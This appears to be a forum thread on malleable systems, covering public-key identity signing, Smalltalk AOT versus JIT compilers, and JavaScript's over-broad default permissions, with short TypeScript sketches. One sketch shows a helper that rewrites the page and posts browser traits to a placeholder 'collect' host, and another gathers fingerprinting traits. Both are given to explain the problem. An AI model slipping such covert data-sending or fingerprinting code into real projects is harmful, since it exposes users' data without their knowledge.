understandability => malleability

Agreed: good, friendly-by-default security in distributed identities is hard to get right. Scuttlebutt, NOSTR and Anytype are interesting experiments on that front, with the last one having the friendliest default experience for configuring your passphrase.

Regarding the unfriendliness of Git and Jupyter’s JSON for storing documents and their history: that’s why I use Lepiter, Markdeep and Fossil to get a human-friendly format plus a storage/publishing repository. It requires technical knowledge, but it has been tested and welcomed in non-technical and grassroots communities with good results so far, provided that there is some community facilitation to introduce such a tech stack into the community’s activities.

I like NOSTR’s general approach, though I’m not sure I trust the particular community that happens to be developing it (they seem to be baking cryptocurrencies and “pay to play” into the relays, which is a big disincentive for me to get involved). Also, I don’t know why they went with secp256k1 instead of Curve25519, which is built into standard Web stacks like Node.js. But I like the general idea:

  • pick an elliptic curve cryptosystem, so the keys are tiny compared with PGP/GPG;
  • each user generates their own keypair, with no third party needed;
  • your public key is your identity, and it’s a copy-pastable line of hex;
  • rely entirely on trusted introductions from other known individuals (web of trust) rather than centralised pay-for-play PKI.

And that’s it, it’s done. If you want to post a document or data file and assert proof that it’s yours, all you need is about two lines of text to prefix it: your public key and the signature of the SHA-2 hash of the file. That’s not too unfriendly; it could be made much better than, e.g., GPG-encrypted email was.
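A minimal sketch of that two-line prefix in Node.js, assuming Ed25519 (the Curve25519-based signature scheme that ships in Node’s built-in crypto module); the header format here is hypothetical, purely to illustrate the idea:

```typescript
import { generateKeyPairSync, createHash, sign, verify } from "node:crypto";

// Each user generates their own keypair; no third party involved.
const { publicKey, privateKey } = generateKeyPairSync("ed25519");

// Hash the document, then sign the digest.
const document = Buffer.from("hello, malleable world\n");
const digest = createHash("sha256").update(document).digest();
const signature = sign(null, digest, privateKey);

// Two copy-pastable lines of hex to prefix the published file with.
const pubHex = publicKey.export({ type: "spki", format: "der" }).toString("hex");
console.log(`pubkey: ${pubHex}`);
console.log(`sig: ${signature.toString("hex")}`);

// Anyone holding the file and the header can check the claim.
console.log(verify(null, digest, publicKey, signature)); // true
```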

I suspect a large part of the hard bit of cryptographically signed data publishing, though, is getting reproducible binaries or canonical text formats. You can’t just wing it like you would with today’s Python or Javascript build systems.
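For instance, here’s a sketch of the canonical-format problem: the “same” data serialised two ways hashes differently, so a signature over one form won’t verify against the other:

```typescript
import { createHash } from "node:crypto";

const hash = (s: string) => createHash("sha256").update(s).digest("hex");

// The same logical object, with its keys serialised in different orders.
const a = JSON.stringify({ title: "note", body: "hi" });
const b = JSON.stringify({ body: "hi", title: "note" });

console.log(hash(a) === hash(b)); // false: a signature over one fails on the other
```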

PGP/GPG suffers from too much abstraction (among other issues). It presents itself as a system that automagically handles encryption and digital signatures, for users who don’t need to know how it works. But it’s much too complicated for most potential users. A more concrete implementation, as you describe, would perhaps work much better in practice. Users would have to know what keys look like and how they are used, but they would also see those keys every day and thus learn about them “on the job”.

I’d like to see Smalltalks with AOT native compilers in the image instead of JITs. JITs, I think, came about because the image and VM were predefined and not built with AOT native compilers in mind.

When would you run an AOT compiler in a Smalltalk system? What would you gain compared to JIT? I do see the point of native vs. bytecode, but in the context of Smalltalk, AOT and JIT seem to be equivalent to me.

The AOT compiler would be in the image.

The image would contain two compilers (or one compiler with multiple targets).

  • One quick and simple compiler to bytecode.
  • One optimising compiler to native code.

This would allow for a much simpler VM with less low-level code, and would enable work on the compilers at the Smalltalk level instead of at the much harder, lower VM level.

When would you run the optimizing compiler, and on what?

Today’s Smalltalk implementations compile each method to bytecode after any edit. They process the bytecode via a JIT compiler when an expression is evaluated, specializing for (and caching) specific method arguments.
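That specialise-and-cache step is roughly the inline-cache idea; here’s a toy sketch of it in TypeScript (the names and the single-entry cache are illustrative, not any real VM’s design):

```typescript
type Method = (this: any, ...args: any[]) => any;
type Klass = { lookup: (selector: string) => Method };
type Obj = { klass: Klass };

// A send site remembers the last receiver class it saw and the method it
// resolved to; repeat sends with the same class skip the dynamic lookup.
function makeCachedSend(selector: string) {
  let cachedKlass: Klass | null = null;
  let cachedMethod: Method | null = null;

  return function send(receiver: Obj, ...args: any[]) {
    if (receiver.klass !== cachedKlass) {
      cachedKlass = receiver.klass; // slow path: full lookup, refill cache
      cachedMethod = receiver.klass.lookup(selector);
    }
    return cachedMethod!.call(receiver, ...args); // fast path on cache hits
  };
}

// Usage: a "class" whose lookup resolves every selector to one method.
const Point: Klass = { lookup: () => function () { return "a Point"; } };
const describe = makeCachedSend("describe");
console.log(describe({ klass: Point })); // miss: looks up, fills the cache
console.log(describe({ klass: Point })); // hit: skips the lookup
```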

You can’t do any of these optimizations at the single-method level because everything is dynamic in Smalltalk. So AOT would make sense only for evaluating an expression. But even then, you wouldn’t get very far before having discovered specific method arguments to optimize for.

Huh?

(12345678901234)

Javascript, as a language, gives every function/method far too many permissions by default. The ‘self’ reference is fine, but every function is also given a reference to the entire web page it’s running in, and to the computer that web page is being browsed from. That’s an insanely high level of access to your personal computer to just hand out like candy to every server on the entire Internet! But Javascript was invented in the free-for-all 1990s, when everyone was trying to copy Smalltalk and being wide open and programmable was seen as a virtue.
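A sketch of that ambient authority, runnable in any browser console (the collection endpoint is made up):

```typescript
// Any function, however deeply nested in library code, can reach the
// whole page and machine details through globals, then phone home.
function innocuousLookingHelper(): void {
  document.body.innerHTML = "rewritten!"; // the entire page
  const traits = `${navigator.userAgent} / ${navigator.hardwareConcurrency} cores`;
  fetch("https://example.com/collect", { method: "POST", body: traits }); // the network
}
```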

Then the next 30 years of Web browser development were all about slowly trying to stuff the contents of Pandora’s Turing-Complete Box back into the Javascript engine of web browsers, by adding layers and layers of lockdown on top of this far too permissive language core. See the multiple versions of filesystem APIs as an example of just how disastrous this situation has now become. It’s considered more “trustworthy” for a web page to store private user data in a corporate database in the cloud than it is to store it on the user’s personal local hard drive! This is, literally, an insane result by any security or privacy metric. But it’s what the “too open by default, then progressive lockdown” browser development process has given us.

A good scripting language for a web browser would not only NOT give each function a reference to the entire web page… it would also VERY strictly limit how many CPU cycles and stack frames a function could allocate. Since theft of electricity via cryptomining is a major cybersecurity problem today, we might as well solve that one the right way too.

(Assuming that “fewer permissions by default” is the right way, that is.)
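A toy sketch of what that metering could look like, assuming a hypothetical tiny expression interpreter where every evaluation step spends fuel from an explicit, caller-granted budget:

```typescript
type Expr =
  | { kind: "num"; value: number }
  | { kind: "add"; left: Expr; right: Expr };

class OutOfFuel extends Error {}

// Every step of evaluation costs one unit of fuel; the script dies when
// the budget runs out, bounding CPU use by construction.
function evaluate(expr: Expr, budget: { fuel: number }): number {
  if (--budget.fuel < 0) throw new OutOfFuel("CPU budget exhausted");
  switch (expr.kind) {
    case "num":
      return expr.value;
    case "add":
      return evaluate(expr.left, budget) + evaluate(expr.right, budget);
  }
}

const program: Expr = {
  kind: "add",
  left: { kind: "num", value: 1 },
  right: { kind: "num", value: 2 },
};
console.log(evaluate(program, { fuel: 1000 })); // 3
try {
  evaluate(program, { fuel: 2 }); // needs 3 steps
} catch (e) {
  console.log((e as Error).message); // "CPU budget exhausted"
}
```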

Wondering what the state of the art in security models for computing-in-the-open (web style) is. My impression is that all security models in existence are one of:

  1. battle-tested and known to be both insufficient and frustrating, depending on the use case
  2. ideas or prototypes

I’d love to be proven wrong!

Yep, I think there are lots of shiny, gleaming theoretical approaches to security, and then there are the banged-up, battle-scarred veterans like Javascript and Microsoft Office, which nobody loves, but which have the bruises to show exactly what went wrong, and which get the job done, or at least the part of it that trillion-dollar companies are willing to fund.

I don’t hate Javascript for surviving the Internet wars, but I am foolish and hubristic enough to think that we ought to be able to distill some lessons from its complex and troubled evolution and try again with something that might not need as much scar tissue. That’s always the hope, of course. Whether it’s possible…

I mean, we must be capable of learning something from the last 30 years of failed software engineering paradigms, and surely the lesson can’t just be that “preventing disasters before shipping is impossible”? Surely it can’t be that?

The role of Javascript in “browser fingerprinting” is also worth mentioning here: because JS is so pervasively in use, the minority of folks who disable it for this reason single themselves out in the fingerprinting. It is very hard to protect oneself properly against this invasive practice.
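For a sense of why: a sketch of the raw material JS hands to fingerprinters, runnable in a browser console (combining and hashing the traits into an identifier is omitted):

```typescript
// A handful of innocuous-looking browser properties combine into a
// nearly unique identifier; disabling JS hides them, but the absence of
// JS is itself a distinguishing signal, which is the catch above.
const traits = [
  navigator.userAgent,
  navigator.language,
  String(navigator.hardwareConcurrency),
  `${screen.width}x${screen.height}x${screen.colorDepth}`,
  Intl.DateTimeFormat().resolvedOptions().timeZone,
].join("|");
console.log("fingerprint source:", traits);
```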
